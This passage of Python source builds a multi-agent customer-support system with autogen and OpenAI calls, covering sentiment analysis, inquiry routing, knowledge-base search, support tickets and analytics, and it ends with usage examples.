189 1. Provide detailed product information and specifications
190 2. Compare products and recommend options based on customer needs
191 3. Explain product features and benefits
192 4. Assist with product setup and configuration
193 5. Address product compatibility questions
194
195 Be enthusiastic and knowledgeable about our products without being pushy. Focus on
196 helping customers find the right product for their specific needs. Highlight key features
197 and benefits relevant to the customer's use case. Provide accurate specifications and
198 honest comparisons. If you don't know a specific detail, acknowledge this rather than
199 guessing.""",
200 llm_config=self.llm_config
201 )
202
203 # 5. Customer Satisfaction Specialist - For complaints and escalations
204 self.satisfaction_specialist = autogen.AssistantAgent(
205 name="SatisfactionSpecialist",
206 system_message="""You are an expert customer satisfaction specialist who excels at
207 handling complaints, escalations, and turning negative experiences into positive ones.
208
209 Your responsibilities:
210 1. Address customer complaints with empathy and understanding
211 2. De-escalate tense situations and resolve conflicts
212 3. Find creative solutions to satisfy dissatisfied customers
213 4. Identify process improvements from complaint patterns
214 5. Ensure customer retention through exceptional service recovery
215
216 Always validate the customer's feelings first before moving to solutions. Use phrases like
217 "I understand why that would be frustrating" and "You're right to bring this to our attention."
218 Take ownership of issues even if they weren't your fault. Focus on what you can do rather
219 than limitations. Be generous in making things right - the lifetime value of a retained
220 customer far exceeds most compensation costs.""",
221 llm_config=self.llm_config
222 )
223
224 # 6. Support Manager - For coordinating complex cases
225 self.support_manager = autogen.AssistantAgent(
226 name="SupportManager",
227 system_message="""You are an experienced support manager who coordinates complex
228 support cases and ensures customers receive the best possible assistance.
229
230 Your responsibilities:
231 1. Evaluate complex customer issues and determine the best approach
232 2. Coordinate between different specialist agents when needed
233 3. Make executive decisions about exceptional customer service measures
234 4. Ensure consistent quality of support across all interactions
235 5. Identify systemic issues that need to be addressed
236
237 Your focus is on ensuring exceptional customer service in complex situations. You have
238 authority to approve special exceptions to policies when warranted. Coordinate the efforts
239 of specialist agents to provide a seamless experience. Recognize when an issue indicates
240 a larger problem that needs to be addressed. Always maintain a professional, leadership-oriented
241 tone while showing genuine concern for customer satisfaction.""",
242 llm_config=self.llm_config
243 )
244
245 # User proxy agent for orchestrating the workflow
246 self.user_proxy = autogen.UserProxyAgent(
247 name="CustomerServiceCoordinator",
248 human_input_mode="NEVER",
249 code_execution_config=False,
250 system_message="""You are a coordinator for customer service interactions.
251 Your role is to manage the flow of information between the customer and the specialized agents.
252 You help route customer inquiries to the right specialist and ensure a smooth conversation."""
253 )
254
255 def analyze_sentiment(self, text: str) -> Dict[str, Any]:
256 """
257 Analyze the sentiment of customer messages.
258
259 Args:
260 text: Customer message text
261
262 Returns:
263 Dictionary with sentiment analysis results
264 """
265 try:
266 # Use OpenAI to analyze sentiment
267 response = client.chat.completions.create(
268 model="gpt-4-turbo",
269 messages=[
270 {"role": "system", "content": "You are a sentiment analysis expert. Analyze the customer message and provide a detailed sentiment assessment."},
271 {"role": "user", "content": f"Analyze the sentiment of this customer message. Return a JSON object with sentiment_score (from -1 to 1), emotion_label (angry, frustrated, neutral, satisfied, happy), urgency_level (low, medium, high), and key_issues (array of issues mentioned).\n\nCustomer message: {text}"}
272 ],
273 temperature=0.2,
274 response_format={"type": "json_object"}
275 )
276
277 # Parse the response
278 sentiment_analysis = json.loads(response.choices[0].message.content)
279
280 return sentiment_analysis
281
282 except Exception as e:
283 logger.error(f"Error analyzing sentiment: {e}")
284 # Return default values if analysis fails
285 return {
286 "sentiment_score": 0,
287 "emotion_label": "neutral",
288 "urgency_level": "medium",
289 "key_issues": []
290 }
291
292 def categorize_inquiry(self, text: str) -> Dict[str, Any]:
293 """
294 Categorize a customer inquiry to determine routing.
295
296 Args:
297 text: Customer inquiry text
298
299 Returns:
300 Dictionary with categorization results
301 """
302 try:
303 # Use OpenAI to categorize the inquiry
304 response = client.chat.completions.create(
305 model="gpt-4-turbo",
306 messages=[
307 {"role": "system", "content": "You are a customer support specialist who categorizes incoming customer inquiries."},
308 {"role": "user", "content": f"Categorize this customer inquiry. Return a JSON object with primary_category (technical, billing, product, account, general, complaint), subcategory (specific issue type), priority (low, medium, high, urgent), and required_info (array of information needed to resolve).\n\nCustomer inquiry: {text}"}
309 ],
310 temperature=0.2,
311 response_format={"type": "json_object"}
312 )
313
314 # Parse the response
315 categorization = json.loads(response.choices[0].message.content)
316
317 return categorization
318
319 except Exception as e:
320 logger.error(f"Error categorizing inquiry: {e}")
321 # Return default values if categorization fails
322 return {
323 "primary_category": "general",
324 "subcategory": "undefined",
325 "priority": "medium",
326 "required_info": []
327 }
328
    def search_knowledge_base(self, query: str, category: Optional[str] = None) -> List[Dict[str, Any]]:
        """
        Search the knowledge base for relevant information.

        Args:
            query: Search query
            category: Optional category to limit search

        Returns:
            List of relevant knowledge base entries
        """
        results = []

        try:
            # Honor the optional category filter; fall back to the full
            # knowledge base when the category is missing or unknown.
            if category and category in self.knowledge_base:
                searchable = {category: self.knowledge_base[category]}
            else:
                searchable = self.knowledge_base

            # Convert the searchable entries to a string for the prompt
            kb_text = json.dumps(searchable, indent=2)

            # Prepare the prompt. JSON mode returns an object, so the array
            # of matches is requested under a "results" key.
            prompt = f"""Given the following knowledge base and a customer query, identify the most relevant entries that would help answer the query.

            KNOWLEDGE BASE:
            {kb_text}

            CUSTOMER QUERY:
            {query}

            Return a JSON object with a single key "results" whose value is an array of the most relevant entries, with each object containing:
            1. category: The category in the knowledge base
            2. key: The specific key within that category
            3. relevance_score: A score from 0-1 indicating how relevant this entry is to the query
            4. reasoning: Brief explanation of why this is relevant

            Only include entries with relevance_score > 0.7. Limit to the top 3 most relevant entries.
            """

            # Get response from OpenAI
            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": "You are a knowledge base search specialist who identifies the most relevant information to address customer queries."},
                    {"role": "user", "content": prompt}
                ],
                temperature=0.2,
                response_format={"type": "json_object"}
            )

            # Parse the response and unwrap the "results" array
            search_results = json.loads(response.choices[0].message.content)
            if isinstance(search_results, dict):
                search_results = search_results.get("results", [])

            # Look up the actual content for each result. A separate name is
            # used so the `category` argument is not overwritten.
            for result in search_results:
                if not isinstance(result, dict):
                    continue
                result_category = result.get("category")
                key = result.get("key")

                if result_category in self.knowledge_base and key in self.knowledge_base[result_category]:
                    content = self.knowledge_base[result_category][key]
                    results.append({
                        "category": result_category,
                        "key": key,
                        "content": content,
                        "relevance_score": result.get("relevance_score", 0.7),
                        "reasoning": result.get("reasoning", "")
                    })

            return results

        except Exception as e:
            logger.error(f"Error searching knowledge base: {e}")
            return []
402
403 def create_support_ticket(self, customer_id: str, inquiry: str, category: str, priority: str) -> Dict[str, Any]:
404 """
405 Create a support ticket for a customer inquiry.
406
407 Args:
408 customer_id: Unique customer identifier
409 inquiry: Customer inquiry text
410 category: Issue category
411 priority: Issue priority
412
413 Returns:
414 Dictionary with ticket information
415 """
416 # Generate a unique ticket ID
417 ticket_id = f"TICKET-{uuid.uuid4().hex[:8]}"
418
419 # Analyze sentiment
420 sentiment = self.analyze_sentiment(inquiry)
421
422 # Create the ticket
423 ticket = {
424 "ticket_id": ticket_id,
425 "customer_id": customer_id,
426 "created_at": datetime.datetime.now().isoformat(),
427 "updated_at": datetime.datetime.now().isoformat(),
428 "status": "open",
429 "category": category,
430 "subcategory": "",
431 "priority": priority,
432 "inquiry": inquiry,
433 "sentiment": sentiment,
434 "agent_assigned": None,
435 "resolution": None,
436 "resolution_time": None,
437 "feedback": None,
438 "satisfaction_score": None,
439 "history": [
440 {
441 "timestamp": datetime.datetime.now().isoformat(),
442 "action": "ticket_created",
443 "details": "Ticket created from customer inquiry"
444 }
445 ]
446 }
447
448 # Store the ticket
449 self.tickets[ticket_id] = ticket
450
451 # Save tickets to disk
452 self._save_tickets()
453
454 return ticket
455
456 def _save_tickets(self):
457 """Save support tickets to a JSON file."""
458 try:
459 with open(self.tickets_path, 'w') as f:
460 json.dump(self.tickets, f, indent=2)
461 logger.info("Support tickets saved successfully")
462 except Exception as e:
463 logger.error(f"Error saving support tickets: {e}")
464
465 def update_ticket(self, ticket_id: str, updates: Dict[str, Any]) -> Dict[str, Any]:
466 """
467 Update an existing support ticket.
468
469 Args:
470 ticket_id: Ticket identifier
471 updates: Dictionary of fields to update
472
473 Returns:
474 Updated ticket information
475 """
476 if ticket_id not in self.tickets:
477 logger.error(f"Ticket {ticket_id} not found")
478 return None
479
480 # Get the existing ticket
481 ticket = self.tickets[ticket_id]
482
483 # Update fields
484 for key, value in updates.items():
485 if key != "history" and key != "ticket_id":
486 ticket[key] = value
487
488 # Add history entry
489 history_entry = {
490 "timestamp": datetime.datetime.now().isoformat(),
491 "action": "ticket_updated",
492 "details": f"Updated fields: {', '.join(updates.keys())}"
493 }
494 ticket["history"].append(history_entry)
495
496 # Update the updated_at timestamp
497 ticket["updated_at"] = datetime.datetime.now().isoformat()
498
499 # Save the updated ticket
500 self.tickets[ticket_id] = ticket
501 self._save_tickets()
502
503 return ticket
504
    def close_ticket(self, ticket_id: str, resolution: str, satisfaction_score: Optional[int] = None) -> Optional[Dict[str, Any]]:
        """
        Close a support ticket with resolution.

        Args:
            ticket_id: Ticket identifier
            resolution: Resolution description
            satisfaction_score: Optional customer satisfaction score (1-5)

        Returns:
            Closed ticket information, or None if the ticket does not exist
        """
        if ticket_id not in self.tickets:
            logger.error(f"Ticket {ticket_id} not found")
            return None

        # Get the existing ticket
        ticket = self.tickets[ticket_id]

        # Calculate resolution time
        created_at = datetime.datetime.fromisoformat(ticket["created_at"])
        closed_at = datetime.datetime.now()
        resolution_time_seconds = (closed_at - created_at).total_seconds()

        # Update ticket
        updates = {
            "status": "closed",
            "resolution": resolution,
            "resolution_time": resolution_time_seconds,
            "updated_at": closed_at.isoformat()
        }

        if satisfaction_score is not None:
            updates["satisfaction_score"] = satisfaction_score

        # Add history entry
        history_entry = {
            "timestamp": closed_at.isoformat(),
            "action": "ticket_closed",
            "details": f"Ticket closed with resolution: {resolution}"
        }

        # Apply updates
        for key, value in updates.items():
            ticket[key] = value

        ticket["history"].append(history_entry)

        # Save the updated ticket
        self.tickets[ticket_id] = ticket
        self._save_tickets()

        # Extract learnings from this ticket
        self._extract_knowledge_from_ticket(ticket)

        return ticket

    def _extract_knowledge_from_ticket(self, ticket: Dict[str, Any]):
        """
        Extract knowledge from a resolved ticket to improve the knowledge base.

        Args:
            ticket: Resolved support ticket
        """
        # Only process closed tickets with resolutions
        if ticket["status"] != "closed" or not ticket["resolution"]:
            return

        try:
            # Prepare the prompt for knowledge extraction
            prompt = f"""Analyze this resolved support ticket and identify any knowledge that should be added to our knowledge base.

TICKET DETAILS:
Inquiry: {ticket['inquiry']}
Category: {ticket['category']}
Resolution: {ticket['resolution']}

Extract the following:
1. What key information helped resolve this issue?
2. Is this a common issue that should be added to FAQs or troubleshooting?
3. What category in the knowledge base would this information belong to?
4. What key/title would be appropriate for this entry?
5. What content should be included?

Return as a JSON object with suggested_category, suggested_key, suggested_content, and confidence (0-1) indicating how strongly you believe this should be added to the knowledge base.
"""

            # Get response from OpenAI
            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": "You are a knowledge management specialist who extracts valuable information from support interactions to improve knowledge bases."},
                    {"role": "user", "content": prompt}
                ],
                temperature=0.3,
                response_format={"type": "json_object"}
            )

            # Parse the response
            knowledge = json.loads(response.choices[0].message.content)

            # Only add to knowledge base if confidence is high enough
            if knowledge.get("confidence", 0) >= 0.8:
                category = knowledge.get("suggested_category")
                key = knowledge.get("suggested_key")
                content = knowledge.get("suggested_content")

                if category and key and content:
                    # Ensure category exists
                    if category not in self.knowledge_base:
                        self.knowledge_base[category] = {}

                    # Add the new knowledge
                    self.knowledge_base[category][key] = content

                    # Save the updated knowledge base
                    self.save_knowledge_base()

                    logger.info(f"Added new knowledge to {category}/{key} from ticket {ticket['ticket_id']}")

        except Exception as e:
            logger.error(f"Error extracting knowledge from ticket: {e}")

    def route_to_specialist(self, inquiry: str, customer_id: str = "anonymous") -> Dict[str, Any]:
        """
        Route a customer inquiry to the appropriate specialist based on content.

        Args:
            inquiry: Customer inquiry text
            customer_id: Optional customer identifier

        Returns:
            Dictionary with routing results
        """
        # Categorize the inquiry
        categorization = self.categorize_inquiry(inquiry)

        # Create a support ticket
        ticket = self.create_support_ticket(
            customer_id=customer_id,
            inquiry=inquiry,
            category=categorization.get("primary_category", "general"),
            priority=categorization.get("priority", "medium")
        )

        # Map primary category to specialist agent
        specialist_mapping = {
            "technical": self.technical_specialist,
            "billing": self.billing_specialist,
            "product": self.product_specialist,
            "complaint": self.satisfaction_specialist,
            "general": self.front_desk_agent
        }

        # Get the appropriate specialist
        primary_category = categorization.get("primary_category", "general")
        specialist = specialist_mapping.get(primary_category, self.front_desk_agent)

        # Update ticket with assigned agent
        self.update_ticket(
            ticket_id=ticket["ticket_id"],
            updates={"agent_assigned": specialist.name}
        )

        return {
            "ticket_id": ticket["ticket_id"],
            "specialist": specialist.name,
            "category": primary_category,
            "subcategory": categorization.get("subcategory", ""),
            "priority": categorization.get("priority", "medium")
        }

    def handle_customer_message(self, message: str, customer_id: str = "anonymous", conversation_id: Optional[str] = None) -> Dict[str, Any]:
        """
        Handle a customer message with the appropriate agent.

        Args:
            message: Customer message text
            customer_id: Optional customer identifier
            conversation_id: Optional conversation identifier

        Returns:
            Dictionary with response and metadata
        """
        # Generate conversation ID if not provided
        if not conversation_id:
            conversation_id = f"CONV-{uuid.uuid4().hex[:8]}"

        # Initialize conversation history if needed
        if conversation_id not in self.conversation_history:
            self.conversation_history[conversation_id] = {
                "customer_id": customer_id,
                "created_at": datetime.datetime.now().isoformat(),
                "updated_at": datetime.datetime.now().isoformat(),
                "messages": [],
                "sentiment_trend": [],
                "active_ticket_id": None
            }

        # Analyze sentiment
        sentiment = self.analyze_sentiment(message)

        # Update sentiment trend
        self.conversation_history[conversation_id]["sentiment_trend"].append({
            "timestamp": datetime.datetime.now().isoformat(),
            "sentiment_score": sentiment.get("sentiment_score", 0),
            "emotion_label": sentiment.get("emotion_label", "neutral")
        })

        # Add customer message to history
        self.conversation_history[conversation_id]["messages"].append({
            "timestamp": datetime.datetime.now().isoformat(),
            "sender": "customer",
            "message": message,
            "sentiment": sentiment
        })

        # Update timestamp
        self.conversation_history[conversation_id]["updated_at"] = datetime.datetime.now().isoformat()

        # Check if we need to create or update a ticket
        active_ticket_id = self.conversation_history[conversation_id].get("active_ticket_id")

        # Look up specialist agents by the name stored on the ticket
        specialists_by_name = {
            "TechnicalSpecialist": self.technical_specialist,
            "BillingSpecialist": self.billing_specialist,
            "ProductSpecialist": self.product_specialist,
            "SatisfactionSpecialist": self.satisfaction_specialist
        }

        if not active_ticket_id:
            # Route to specialist and create ticket
            routing = self.route_to_specialist(message, customer_id)
            active_ticket_id = routing.get("ticket_id")
            specialist_name = routing.get("specialist")

            # Update conversation with ticket ID
            self.conversation_history[conversation_id]["active_ticket_id"] = active_ticket_id

            # Select the appropriate specialist agent (front desk is the fallback)
            specialist = specialists_by_name.get(specialist_name, self.front_desk_agent)
        else:
            # Get the existing ticket
            ticket = self.tickets.get(active_ticket_id)

            if ticket:
                specialist_name = ticket.get("agent_assigned", "FrontDeskAgent")

                # Select the appropriate specialist agent (front desk is the fallback)
                specialist = specialists_by_name.get(specialist_name, self.front_desk_agent)

                # Record the latest message in the ticket history.
                # update_ticket() ignores the "history" key, so append directly.
                preview = f"{message[:100]}..." if len(message) > 100 else message
                ticket["history"].append({
                    "timestamp": datetime.datetime.now().isoformat(),
                    "action": "customer_message",
                    "details": f"Customer message: {preview}"
                })
                ticket["updated_at"] = datetime.datetime.now().isoformat()
                self._save_tickets()
            else:
                # Ticket not found, use front desk agent
                specialist = self.front_desk_agent

        # Search knowledge base for relevant information
        knowledge_results = self.search_knowledge_base(message)

        # Create context from conversation history
        context = self._prepare_conversation_context(conversation_id)

        # Generate the prompt for the specialist
        knowledge_context = ""
        if knowledge_results:
            knowledge_context = "Relevant knowledge base entries:\n"
            for i, entry in enumerate(knowledge_results, 1):
                knowledge_context += f"{i}. {entry['category']} - {entry['key']}:\n{entry['content']}\n\n"

        prompt = f"""
        You are responding to a customer inquiry. Use the conversation history and knowledge base to provide a helpful response.

        CONVERSATION HISTORY:
        {context}

        CURRENT CUSTOMER MESSAGE:
        {message}

        {knowledge_context}

        CUSTOMER SENTIMENT:
        Sentiment Score: {sentiment.get('sentiment_score', 0)}
        Emotion: {sentiment.get('emotion_label', 'neutral')}
        Urgency: {sentiment.get('urgency_level', 'medium')}

        Please provide a helpful, accurate response that addresses the customer's needs. Be empathetic and solution-oriented.
        If you need more information to properly help the customer, politely ask for the specific details you need.
        """

        # Get response from the specialist
        response = client.chat.completions.create(
            model="gpt-4-turbo",
            messages=[
                {"role": "system", "content": specialist.system_message},
                {"role": "user", "content": prompt}
            ],
            temperature=0.7,
            max_tokens=1000
        )

        agent_response = response.choices[0].message.content

        # Add agent response to conversation history
        self.conversation_history[conversation_id]["messages"].append({
            "timestamp": datetime.datetime.now().isoformat(),
            "sender": "agent",
            "agent": specialist.name,
            "message": agent_response
        })

        # Save conversation history
        self._save_conversation_history()

        # Check if the issue is resolved
        resolved = self._check_if_resolved(agent_response)
        if resolved and active_ticket_id:
            self.close_ticket(
                ticket_id=active_ticket_id,
                resolution=f"Resolved by {specialist.name}: {resolved.get('resolution_summary', 'Issue addressed')}"
            )
            # Clear active ticket from conversation
            self.conversation_history[conversation_id]["active_ticket_id"] = None

        return {
            "response": agent_response,
            "agent": specialist.name,
            "conversation_id": conversation_id,
            "sentiment": sentiment,
            "ticket_id": active_ticket_id,
            "resolved": resolved is not None
        }

    def _prepare_conversation_context(self, conversation_id: str) -> str:
        """
        Prepare conversation context from history.

        Args:
            conversation_id: Conversation identifier

        Returns:
            String with formatted conversation context
        """
        if conversation_id not in self.conversation_history:
            return "No conversation history available."

        # Get conversation history
        conversation = self.conversation_history[conversation_id]
        messages = conversation.get("messages", [])

        # Format context (limiting to last 10 messages to avoid token limits)
        context = ""
        for msg in messages[-10:]:
            sender = "Customer" if msg.get("sender") == "customer" else msg.get("agent", "Agent")
            timestamp = msg.get("timestamp", "")
            message = msg.get("message", "")

            context += f"{sender} ({timestamp}):\n{message}\n\n"

        return context

    def _save_conversation_history(self):
        """Save conversation history to a JSON file."""
        try:
            with open(self.history_path, 'w') as f:
                json.dump(self.conversation_history, f, indent=2)
            logger.info("Conversation history saved successfully")
        except Exception as e:
            logger.error(f"Error saving conversation history: {e}")

    def _check_if_resolved(self, agent_response: str) -> Optional[Dict[str, Any]]:
        """
        Check if the agent response indicates the issue is resolved.

        Args:
            agent_response: Agent's response text

        Returns:
            Dictionary with resolution info if resolved, None otherwise
        """
        try:
            # Use OpenAI to determine if the issue is resolved
            prompt = f"""Analyze this customer support agent's response and determine if it indicates the customer issue has been fully resolved.

AGENT RESPONSE:
{agent_response}

Consider:
1. Does the response indicate that all customer questions/issues have been addressed?
2. Is the agent concluding the conversation or are they expecting further input?
3. Is the response a complete solution or just a step in the troubleshooting process?

Return a JSON object with:
1. is_resolved: boolean indicating if the issue appears fully resolved
2. resolution_type: "complete", "partial", or "not_resolved"
3. resolution_summary: Brief summary of the resolution if applicable
4. confidence: 0-1 score of how confident you are in this assessment
"""

            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": "You are a customer support quality assurance specialist who evaluates if issues have been resolved."},
                    {"role": "user", "content": prompt}
                ],
                temperature=0.1,
                response_format={"type": "json_object"}
            )

            # Parse the response
            resolution_check = json.loads(response.choices[0].message.content)

            # Only consider it resolved if confidence is high and is_resolved is true
            if (resolution_check.get("is_resolved", False) and
                    resolution_check.get("confidence", 0) >= 0.8 and
                    resolution_check.get("resolution_type") == "complete"):
                return resolution_check

            return None

        except Exception as e:
            logger.error(f"Error checking resolution: {e}")
            return None

    def update_knowledge_base_entry(self, category: str, key: str, content: str) -> bool:
        """
        Add or update an entry in the knowledge base.

        Args:
            category: Category (products, faqs, troubleshooting, policies, response_templates)
            key: Entry key/ID
            content: Entry content

        Returns:
            Boolean indicating success
        """
        try:
            # Ensure category exists
            if category not in self.knowledge_base:
                self.knowledge_base[category] = {}

            # Add or update the entry
            self.knowledge_base[category][key] = content

            # Save the knowledge base
            self.save_knowledge_base()

            logger.info(f"Updated knowledge base entry: {category}/{key}")
            return True

        except Exception as e:
            logger.error(f"Error updating knowledge base: {e}")
            return False

    def get_customer_sentiment_trend(self, customer_id: str) -> Dict[str, Any]:
        """
        Get sentiment trend for a specific customer across conversations.

        Args:
            customer_id: Customer identifier

        Returns:
            Dictionary with sentiment trend analysis
        """
        # Find all conversations for this customer
        customer_conversations = {
            conv_id: conv_data for conv_id, conv_data in self.conversation_history.items()
            if conv_data.get("customer_id") == customer_id
        }

        if not customer_conversations:
            # Return the same keys as the populated result so callers can rely on them
            return {
                "customer_id": customer_id,
                "conversations_count": 0,
                "interactions_count": 0,
                "average_sentiment": 0,
                "emotion_distribution": {},
                "sentiment_trend": []
            }

        # Extract all sentiment data points
        all_sentiment_data = []
        for conv_id, conv_data in customer_conversations.items():
            for sentiment_entry in conv_data.get("sentiment_trend", []):
                all_sentiment_data.append({
                    "timestamp": sentiment_entry.get("timestamp"),
                    "score": sentiment_entry.get("sentiment_score", 0),
                    "emotion": sentiment_entry.get("emotion_label", "neutral"),
                    "conversation_id": conv_id
                })

        # Sort by timestamp (entries without a timestamp sort first)
        all_sentiment_data.sort(key=lambda x: x.get("timestamp") or "")

        # Calculate average sentiment
        avg_sentiment = sum(entry.get("score", 0) for entry in all_sentiment_data) / len(all_sentiment_data) if all_sentiment_data else 0

        # Count emotion types
        emotion_counts = {}
        for entry in all_sentiment_data:
            emotion = entry.get("emotion", "neutral")
            emotion_counts[emotion] = emotion_counts.get(emotion, 0) + 1

        # Calculate sentiment trend over time
        trend_points = []
        if len(all_sentiment_data) > 1:
            # Group by day for longer periods
            days = {}
            for entry in all_sentiment_data:
                timestamp = entry.get("timestamp")
                if not timestamp:
                    # Skip entries without a usable timestamp
                    continue
                # ISO timestamps look like "YYYY-MM-DDTHH:MM:SS"; keep the date part
                date_str = timestamp.split("T")[0]
                days.setdefault(date_str, []).append(entry.get("score", 0))

            for date_str, scores in days.items():
                avg_score = sum(scores) / len(scores)
                trend_points.append({
                    "date": date_str,
                    "average_sentiment": avg_score
                })

            # Sort by date
            trend_points.sort(key=lambda x: x.get("date", ""))

        return {
            "customer_id": customer_id,
            "conversations_count": len(customer_conversations),
            "interactions_count": len(all_sentiment_data),
            "average_sentiment": avg_sentiment,
            "emotion_distribution": emotion_counts,
            "sentiment_trend": trend_points
        }

    def generate_support_insights(self) -> Dict[str, Any]:
        """
        Generate insights from support interactions.

        Returns:
            Dictionary with support insights
        """
        insights = {
            "tickets": {
                "total": len(self.tickets),
                "open": sum(1 for t in self.tickets.values() if t.get("status") == "open"),
                "closed": sum(1 for t in self.tickets.values() if t.get("status") == "closed"),
                "by_category": {},
                "by_priority": {},
                "avg_resolution_time": 0
            },
            "sentiment": {
                "average": 0,
                "distribution": {}
            },
            "common_issues": [],
            "knowledge_gaps": [],
            "top_performing_responses": []
        }

        # Calculate ticket statistics
        if self.tickets:
            # Count by category and priority
            for ticket in self.tickets.values():
                category = ticket.get("category", "uncategorized")
                insights["tickets"]["by_category"][category] = insights["tickets"]["by_category"].get(category, 0) + 1

                priority = ticket.get("priority", "medium")
                insights["tickets"]["by_priority"][priority] = insights["tickets"]["by_priority"].get(priority, 0) + 1

            # Calculate average resolution time for closed tickets
            closed_tickets = [t for t in self.tickets.values() if t.get("status") == "closed" and t.get("resolution_time")]
            if closed_tickets:
                avg_time = sum(t.get("resolution_time", 0) for t in closed_tickets) / len(closed_tickets)
                insights["tickets"]["avg_resolution_time"] = avg_time

        # Calculate sentiment statistics
        all_sentiment_scores = []
        emotion_counts = {}

        for conv_data in self.conversation_history.values():
            for sentiment_entry in conv_data.get("sentiment_trend", []):
                score = sentiment_entry.get("sentiment_score", 0)
                all_sentiment_scores.append(score)

                emotion = sentiment_entry.get("emotion_label", "neutral")
                emotion_counts[emotion] = emotion_counts.get(emotion, 0) + 1

        if all_sentiment_scores:
            insights["sentiment"]["average"] = sum(all_sentiment_scores) / len(all_sentiment_scores)
            insights["sentiment"]["distribution"] = emotion_counts

        # Identify common issues and knowledge gaps
        try:
            # Use OpenAI to analyze tickets and identify patterns
            # First, prepare a summary of closed tickets
            closed_tickets_sample = [t for t in self.tickets.values() if t.get("status") == "closed"]
            # Limit to 20 tickets to avoid token limits (slicing is a no-op on shorter lists)
            closed_tickets_sample = closed_tickets_sample[:20]

            tickets_summary = []
            for ticket in closed_tickets_sample:
                tickets_summary.append({
                    "inquiry": ticket.get("inquiry", ""),
                    "category": ticket.get("category", ""),
                    "resolution": ticket.get("resolution", ""),
                    "resolution_time": ticket.get("resolution_time", 0)
                })

            if tickets_summary:
                prompt = """Analyze these resolved support tickets and identify:
                1. Common issues that customers are experiencing
                2. Knowledge gaps where we might need more documentation
                3. Most effective responses that led to positive outcomes

                Return a JSON object with common_issues (array), knowledge_gaps (array), and top_performing_responses (array).
                """

                response = client.chat.completions.create(
                    model="gpt-4-turbo",
                    messages=[
                        {"role": "system", "content": "You are a customer support analytics specialist who identifies patterns and insights from support data."},
                        {"role": "user", "content": prompt + "\n\nTickets: " + json.dumps(tickets_summary)}
                    ],
                    temperature=0.3,
                    response_format={"type": "json_object"}
                )

                analysis = json.loads(response.choices[0].message.content)

                if "common_issues" in analysis:
                    insights["common_issues"] = analysis["common_issues"]
                if "knowledge_gaps" in analysis:
                    insights["knowledge_gaps"] = analysis["knowledge_gaps"]
                if "top_performing_responses" in analysis:
                    insights["top_performing_responses"] = analysis["top_performing_responses"]

        except Exception as e:
            logger.error(f"Error generating support insights: {e}")

        return insights

# Example usage
if __name__ == "__main__":
    # Initialize the agent with a sample knowledge base
    support_agent = CustomerSupportAgent()

    # Add some entries to the knowledge base
    support_agent.update_knowledge_base_entry(
        category="products",
        key="premium_subscription",
        content="""
        Premium Subscription includes:
        - Unlimited access to all features
        - Priority customer support
        - Advanced analytics
        - Team collaboration tools
        - Custom integrations

        Price: $49.99/month or $499.90/year (save 2 months)
        """
    )

    support_agent.update_knowledge_base_entry(
        category="troubleshooting",
        key="login_issues",
        content="""
        Common login issues and solutions:

        1. Forgotten password: Use the "Forgot Password" link on the login page to reset your password via email.

        2. Account locked: After 5 failed login attempts, accounts are temporarily locked for 30 minutes. Contact support if you need immediate access.

        3. Email verification needed: New accounts require email verification. Check your inbox and spam folder for the verification email.

        4. Browser issues: Try clearing your browser cache and cookies, or use a different browser.

        5. VPN interference: Some corporate VPNs may block access. Try connecting without VPN or contact your IT department.
        """
    )

    support_agent.update_knowledge_base_entry(
        category="faqs",
        key="cancellation_policy",
        content="""
        Cancellation Policy:

        - You can cancel your subscription at any time from your account settings.
        - For monthly subscriptions, cancellation takes effect at the end of the current billing period.
        - For annual subscriptions, you may request a prorated refund within 30 days of payment.
        - No refunds are provided for monthly subscriptions.
        - Data is retained for 30 days after cancellation before being permanently deleted.
        """
    )

    # Sample customer conversation
    customer_message = "I'm having trouble logging in to my account. I've tried resetting my password but I'm not receiving the reset email."

    # Process the message
    response = support_agent.handle_customer_message(
        message=customer_message,
        customer_id="CUST12345"
    )

    print("Customer:", customer_message)
    print("\nAgent:", response["response"])
    print("\nSentiment:", response["sentiment"])
    print("Ticket ID:", response["ticket_id"])

    # Follow-up message
    follow_up = "I checked my spam folder and still don't see it. I'm using gmail."

    follow_up_response = support_agent.handle_customer_message(
        message=follow_up,
        customer_id="CUST12345",
        conversation_id=response["conversation_id"]
    )

    print("\nCustomer:", follow_up)
    print("\nAgent:", follow_up_response["response"])

Usage Example:

python
from customer_support_agent import CustomerSupportAgent

# Initialize agent
agent = CustomerSupportAgent()

# Add knowledge base entries
agent.update_knowledge_base_entry(
    category="products",
    key="starter_plan",
    content="""
    Starter Plan Details:
    - 5 users included
    - 100GB storage
    - Email support only
    - Basic analytics
    - $9.99/month or $99/year
    """
)

agent.update_knowledge_base_entry(
    category="troubleshooting",
    key="mobile_sync_issues",
    content="""
    Mobile Sync Troubleshooting:
    1. Ensure you're using the latest app version
    2. Check your internet connection
    3. Try logging out and back in
    4. Verify background data usage is enabled
    5. Clear app cache in your device settings

    If problems persist, please provide:
    - Device model
    - OS version
    - App version
    - Specific error message
    """
)

# Start conversation
conversation_id = None
customer_id = "customer_789"

# Initial inquiry
inquiry = "Hi, the mobile app isn't syncing my latest changes. I'm on an iPhone 13."

response = agent.handle_customer_message(
    message=inquiry,
    customer_id=customer_id
)

conversation_id = response["conversation_id"]
print(f"AGENT ({response['agent']}): {response['response']}")

# Follow-up message
follow_up = "I've tried updating and restarting, but it's still not working. I'm getting an error that says 'Sync failed: Error code 403'"

follow_up_response = agent.handle_customer_message(
    message=follow_up,
    customer_id=customer_id,
    conversation_id=conversation_id
)

print(f"AGENT ({follow_up_response['agent']}): {follow_up_response['response']}")

# Resolution message
resolution = "That worked! I can see my changes now. Thanks for your help."

resolution_response = agent.handle_customer_message(
    message=resolution,
    customer_id=customer_id,
    conversation_id=conversation_id
)

print(f"AGENT ({resolution_response['agent']}): {resolution_response['response']}")

# Get customer sentiment trend
sentiment_trend = agent.get_customer_sentiment_trend(customer_id)
print("\nCUSTOMER SENTIMENT ANALYSIS:")
print(f"Average sentiment: {sentiment_trend['average_sentiment']:.2f}")
print(f"Emotion distribution: {sentiment_trend['emotion_distribution']}")

# Generate support insights
insights = agent.generate_support_insights()
print("\nSUPPORT INSIGHTS:")
print(f"Total tickets: {insights['tickets']['total']}")
print(f"Open tickets: {insights['tickets']['open']}")
print(f"Average resolution time: {insights['tickets']['avg_resolution_time']:.2f} seconds")
if insights['common_issues']:
    print("\nCommon issues identified:")
